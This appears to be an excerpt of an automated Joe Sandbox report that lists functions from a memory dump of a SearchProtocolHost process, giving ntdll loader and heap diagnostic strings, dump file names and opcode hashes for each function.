                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                      • API String ID: 0-4253913091
                                                                                      • Opcode ID: ea40f150e01e0fdeceaefac724c02f01ddefc4b80063e6557bdef05b116d490e
                                                                                      • Instruction ID: f8c9fb6dfa56b38e8bbb4859ccd3db05478c225d14cd67796117200465c88eb4
                                                                                      • Opcode Fuzzy Hash: ea40f150e01e0fdeceaefac724c02f01ddefc4b80063e6557bdef05b116d490e
                                                                                      • Instruction Fuzzy Hash: 05F1CB74A00A05DFDB24CF68C894B7AB7F5FF85304F1886A8E5169B381D734E981DB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 03823608 Relevance: 4.1, Strings: 3, Instructions: 398COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: LdrpResSearchResourceHandle Enter$LdrpResSearchResourceHandle Exit$PE
                                                                                      • API String ID: 0-1168191160
                                                                                      • Opcode ID: 51935ffba649d5cd4fbcd73707a12d184d4cc207a19cb18ac3c29e4fee6841f8
                                                                                      • Instruction ID: 81cd0aa3c73078dcbd87159e3445a63a5e19b3b985a3d5b4ce37efc072f6ea0c
                                                                                      • Opcode Fuzzy Hash: 51935ffba649d5cd4fbcd73707a12d184d4cc207a19cb18ac3c29e4fee6841f8
                                                                                      • Instruction Fuzzy Hash: 3AF172B9A006388BCB20DF98CCA47A9F7B5AF45704F4840E9D509EB240D7B99EC1CF55
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 03791380 Relevance: 4.1, Strings: 3, Instructions: 385COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • HEAP: , xrefs: 037914B6
                                                                                      • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 03791648
                                                                                      • HEAP[%wZ]: , xrefs: 03791632
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                      • API String ID: 0-3178619729
                                                                                      • Opcode ID: 3567cb8de48229739782e37cabc89f9b1ddd89819df0d7da9acd45639d532d79
                                                                                      • Instruction ID: 005cdf8e327a072f8abf938c221ecebec590201557974a10a1d33166b801f0f4
                                                                                      • Opcode Fuzzy Hash: 3567cb8de48229739782e37cabc89f9b1ddd89819df0d7da9acd45639d532d79
                                                                                      • Instruction Fuzzy Hash: 4EE10330A04646DFEB28CF28D49077ABBF5EF48300F588A9EE496CB645E734E951DB50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0379B5E0 Relevance: 4.1, Strings: 3, Instructions: 303COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                                                                      • API String ID: 0-1145731471
                                                                                      • Opcode ID: 051bbc7a9c6ed5a1b58aba662045a607f7784a1815bd0d8948bf8c2afbc78459
                                                                                      • Instruction ID: 9971eca5edbaf997da9321870f31a7c63406958baa2896340fc5e5b25f3eaec5
                                                                                      • Opcode Fuzzy Hash: 051bbc7a9c6ed5a1b58aba662045a607f7784a1815bd0d8948bf8c2afbc78459
                                                                                      • Instruction Fuzzy Hash: 7EB18B39A106448FEF24CF69E890BADB7B5FF44714F18866AE921EB790D730E840CB10
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0381330C Relevance: 4.0, Strings: 3, Instructions: 292COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                                                      • API String ID: 0-2391371766
                                                                                      • Opcode ID: 2fa2fb2d0042ee143895dde28d0d16133b9772d881b22c7656964d0d48225214
                                                                                      • Instruction ID: dcb543ef1b9e91284f81d53333aee197cbc6d84673d30cf8226d0feeab039259
                                                                                      • Opcode Fuzzy Hash: 2fa2fb2d0042ee143895dde28d0d16133b9772d881b22c7656964d0d48225214
                                                                                      • Instruction Fuzzy Hash: A5B1C079614745AFE721EF94CC84B6BB7ECAB44714F0409A9FA50DB280D7B0E814CB92
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0378A147 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID: FilterFullPath$UseFilter$\??\
                                                                                      • API String ID: 2994545307-2779062949
                                                                                      • Opcode ID: 5b9d943831fbe666a9ab9cddb74fb4a34cf5adfeffdb0cbb3a4c00e80f54372d
                                                                                      • Instruction ID: 1cd0ee17ae1140c418007cf3fe01a46fea172b085fa54f3ae954fb70bdb95704
                                                                                      • Opcode Fuzzy Hash: 5b9d943831fbe666a9ab9cddb74fb4a34cf5adfeffdb0cbb3a4c00e80f54372d
                                                                                      • Instruction Fuzzy Hash: C1A17D799016299BDB31DF64CC88BEAF7B8EF48700F1405EAE908A7250D7359E85CF50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0382327E Relevance: 4.0, Strings: 3, Instructions: 236COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                                                                      • API String ID: 0-318774311
                                                                                      • Opcode ID: f80118a715aa21efca9c426aa8fc19fc9a83a2bb54999ff848c84f8543ab744d
                                                                                      • Instruction ID: 8901ef10357fa2ca1fe947447549efc2b631548ccc9c86ab57c4a0fbf054da36
                                                                                      • Opcode Fuzzy Hash: f80118a715aa21efca9c426aa8fc19fc9a83a2bb54999ff848c84f8543ab744d
                                                                                      • Instruction Fuzzy Hash: 8B818279208350AFE711DB54C858F6AFBE8EF84754F0809ADF945DB290DBB8DA40CB52
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0379B360 Relevance: 4.0, Strings: 3, Instructions: 221COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                                                                      • API String ID: 0-373624363
                                                                                      • Opcode ID: 880ed4b676ac6d19d36de3216f39f02f6e8642f6802080ed402ff95a53a84b8e
                                                                                      • Instruction ID: 977efeefc30c4dbe978f77e3f174d3b068a5a436c3d051922743e215537965ba
                                                                                      • Opcode Fuzzy Hash: 880ed4b676ac6d19d36de3216f39f02f6e8642f6802080ed402ff95a53a84b8e
                                                                                      • Instruction Fuzzy Hash: C891D175A04259CFEF21CF98E4447ADB7B4FF44324F18429AE915AB390D378DA80DB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0386B2BC Relevance: 3.9, Strings: 3, Instructions: 180COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • GlobalizationUserSettings, xrefs: 0386B3B4
                                                                                      • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 0386B3AA
                                                                                      • TargetNtPath, xrefs: 0386B3AF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                                                      • API String ID: 0-505981995
                                                                                      • Opcode ID: 50c4426343e094f93a5ff8e2b7b2438201f035fc170d422bf37638239cd4a001
                                                                                      • Instruction ID: 05ccf10542fec43b64716d49442a1211504aade220337f7970753b19649b471c
                                                                                      • Opcode Fuzzy Hash: 50c4426343e094f93a5ff8e2b7b2438201f035fc170d422bf37638239cd4a001
                                                                                      • Instruction Fuzzy Hash: 8D618F72941368ABDB22EF95DC9CBD9B7B8AB44714F0101E9E908EB250D774DE84CF90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037B9723 Relevance: 3.9, Strings: 3, Instructions: 179COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                                                                      • API String ID: 0-2283098728
                                                                                      • Opcode ID: 63ea48be8367dd934ac10e5d32aac4c07f386fca106f8d637dd4b241b1833af6
                                                                                      • Instruction ID: cb19e1493e732bb62b298c57050f65d70a371ce5f5531825520d448f43f3fd4b
                                                                                      • Opcode Fuzzy Hash: 63ea48be8367dd934ac10e5d32aac4c07f386fca106f8d637dd4b241b1833af6
                                                                                      • Instruction Fuzzy Hash: 575106357047019FD724EF38C888BADB7F5BB86710F18066DE7628B692E774A800DB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0378F75B Relevance: 3.9, Strings: 3, Instructions: 167COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • HEAP: , xrefs: 037EE442
                                                                                      • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 037EE455
                                                                                      • HEAP[%wZ]: , xrefs: 037EE435
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                                                      • API String ID: 0-1340214556
                                                                                      • Opcode ID: 7b5d8d38af865cba5b33807c8f64c634fd093e8f798e543d1790ab4e7558e25a
                                                                                      • Instruction ID: 11920d9484e245b80b35805d8dc0b82bfe1bc6249153e65a2bd977ca1be339d8
                                                                                      • Opcode Fuzzy Hash: 7b5d8d38af865cba5b33807c8f64c634fd093e8f798e543d1790ab4e7558e25a
                                                                                      • Instruction Fuzzy Hash: F4512935640784EFE712EBA8D888F5AFBF8FF09704F0849A5E5518B692D374E910DB50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037B1514 Relevance: 3.9, Strings: 3, Instructions: 166COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • LdrpCompleteMapModule, xrefs: 037FA39D
                                                                                      • minkernel\ntdll\ldrmap.c, xrefs: 037FA3A7
                                                                                      • Could not validate the crypto signature for DLL %wZ, xrefs: 037FA396
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                                      • API String ID: 0-1676968949
                                                                                      • Opcode ID: 6e9f8a527512010d3f21d0836e788d4f46caa4079c94413549309adb280da06f
                                                                                      • Instruction ID: 8ef5c4275b788f6c1febd46cc5310843c374f8c81388c962cff8fa4f4c21ed05
                                                                                      • Opcode Fuzzy Hash: 6e9f8a527512010d3f21d0836e788d4f46caa4079c94413549309adb280da06f
                                                                                      • Instruction Fuzzy Hash: ED51F234A04B419FEB21DF6CC958BAAB7F4BF04714F5802A8EA569B7D1D770E900CB40
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0383D62C Relevance: 3.9, Strings: 3, Instructions: 163COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • Heap block at %p modified at %p past requested size of %Ix, xrefs: 0383D7B2
                                                                                      • HEAP: , xrefs: 0383D79F
                                                                                      • HEAP[%wZ]: , xrefs: 0383D792
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                                                      • API String ID: 0-3815128232
                                                                                      • Opcode ID: 1e75d1531994a8c607ea1092baf54efddb6b546f8306dd3046e13bf9c303f49b
                                                                                      • Instruction ID: 83f39257e80f1dd3ca1b86ae9e5af9e6ee73b651a763ec037b3e5682edc93601
                                                                                      • Opcode Fuzzy Hash: 1e75d1531994a8c607ea1092baf54efddb6b546f8306dd3046e13bf9c303f49b
                                                                                      • Instruction Fuzzy Hash: 165126351402548EE764EB69C844772B3E1EB47288F1888C9E4D6CB385E675D44BDBE0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037CC640 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 038080F3
                                                                                      • Failed to reallocate the system dirs string !, xrefs: 038080E2
                                                                                      • LdrpInitializePerUserWindowsDirectory, xrefs: 038080E9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                      • API String ID: 0-1783798831
                                                                                      • Opcode ID: b704a11bbbf0f953df88b6fa7afdfb292e82e84a5d459406c318361d203acadc
                                                                                      • Instruction ID: 36018b790b75f8a69a86adde0268541f418c94311a09e352f2445a0f3a0093f6
                                                                                      • Opcode Fuzzy Hash: b704a11bbbf0f953df88b6fa7afdfb292e82e84a5d459406c318361d203acadc
                                                                                      • Instruction Fuzzy Hash: 284101B5510741ABC721FF68DD44B6BB7E8AF84710F0409AEF958EB291EB70D801CB92
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0378753F Relevance: 3.9, Strings: 3, Instructions: 132COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                                                                      • API String ID: 0-1151232445
                                                                                      • Opcode ID: e5aac5a53bebff0acad01907f2ae14a247473223e161ab3df23b14b063a6d38e
                                                                                      • Instruction ID: 4f202bbf49cc4db7063bde82db573aa682eacac6e79b34f51da9e63149b1d7cb
                                                                                      • Opcode Fuzzy Hash: e5aac5a53bebff0acad01907f2ae14a247473223e161ab3df23b14b063a6d38e
                                                                                      • Instruction Fuzzy Hash: 2041F4347802808FDF69EF6CC0D4B75B7E8AF09205F3C44E9D4879B66ACA65D486CB21
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037C15EF Relevance: 3.9, Strings: 3, Instructions: 127COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • LdrpAllocateTls, xrefs: 0380194A
                                                                                      • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 03801943
                                                                                      • minkernel\ntdll\ldrtls.c, xrefs: 03801954
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                                                      • API String ID: 0-4274184382
                                                                                      • Opcode ID: 08617dcfc5e5bd861479d686b50a04079025147406ba8773587005418caaeb7a
                                                                                      • Instruction ID: d7604e486ca139db2311c883344092af477a1b3d694118d5c72da40648528c65
                                                                                      • Opcode Fuzzy Hash: 08617dcfc5e5bd861479d686b50a04079025147406ba8773587005418caaeb7a
                                                                                      • Instruction Fuzzy Hash: CF415AB9A00705EFDB15DFA8DC85BAEBBB5FF48310F048169E405AB251DB35A900CF90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 038143D5 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • LdrpCheckRedirection, xrefs: 0381450F
                                                                                      • minkernel\ntdll\ldrredirect.c, xrefs: 03814519
                                                                                      • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 03814508
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                      • API String ID: 0-3154609507
                                                                                      • Opcode ID: 26e1bbd097912c3a638a2ca14f2b8cf0889a4144ca45169552dc2395fca79439
                                                                                      • Instruction ID: af194048ab0eba2404ee7b8a9eb239e2a52803764f2c5848c373d74561a1f4dd
                                                                                      • Opcode Fuzzy Hash: 26e1bbd097912c3a638a2ca14f2b8cf0889a4144ca45169552dc2395fca79439
                                                                                      • Instruction Fuzzy Hash: 8841E2726067109FCB20DFDAD840A26B7FCAF48754F0906E9EC59DB255D730EA20DB81
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037C32C0 Relevance: 3.9, Strings: 3, Instructions: 111COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • RtlCreateActivationContext, xrefs: 03802803
                                                                                      • SXS: %s() passed the empty activation context data, xrefs: 03802808
                                                                                      • Actx , xrefs: 037C32CC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                                                                      • API String ID: 0-859632880
                                                                                      • Opcode ID: 0311e41074f9cf618be5c674b1aa51efa2fb6d8d594e8a503e3149c1393fad0b
                                                                                      • Instruction ID: 46f4b07440e231bce56da58008b1f21118af1f40e23c97987623220aaf9985c3
                                                                                      • Opcode Fuzzy Hash: 0311e41074f9cf618be5c674b1aa51efa2fb6d8d594e8a503e3149c1393fad0b
                                                                                      • Instruction Fuzzy Hash: B931233A6103459FEB11CF58D8D4B9AB7A4EB48724F1884ACED05DF281CBB4E805CBD0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0381B214 Relevance: 3.9, Strings: 3, Instructions: 107COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 0381B2B2
                                                                                      • GlobalFlag, xrefs: 0381B30F
                                                                                      • @, xrefs: 0381B2F0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                                                                      • API String ID: 0-4192008846
                                                                                      • Opcode ID: 5e4ef3f8013fe4bcf97dbf5ef23749079c2e3256972b177ae5979139032a74ed
                                                                                      • Instruction ID: 6d0bbc2e04d0b9f67e753ec54f7b4791dce3ceeb840d95a0aceaa9f9b62b50e2
                                                                                      • Opcode Fuzzy Hash: 5e4ef3f8013fe4bcf97dbf5ef23749079c2e3256972b177ae5979139032a74ed
                                                                                      • Instruction Fuzzy Hash: CC312DB5A00219AEDB11EFE4DC85AEEBBBCEF44744F4404A9E605EB141D7749E148B90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037C1527 Relevance: 3.8, Strings: 3, Instructions: 98COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • LdrpInitializeTls, xrefs: 03801851
                                                                                      • minkernel\ntdll\ldrtls.c, xrefs: 0380185B
                                                                                      • DLL "%wZ" has TLS information at %p, xrefs: 0380184A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                                                      • API String ID: 0-931879808
                                                                                      • Opcode ID: c59e6c82ce3681419ca18592dd1ddce89e14d3e16ef14520dc5a2966e726859b
                                                                                      • Instruction ID: b3f85036388edbc16f800e5ba8ffd51a410b2a85e4445949b8f307c2ed24d3b3
                                                                                      • Opcode Fuzzy Hash: c59e6c82ce3681419ca18592dd1ddce89e14d3e16ef14520dc5a2966e726859b
                                                                                      • Instruction Fuzzy Hash: 27316C75A20740EFEB20EB88DC85F6A77ADEB45754F4100BDE502AB282D770ED049BA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

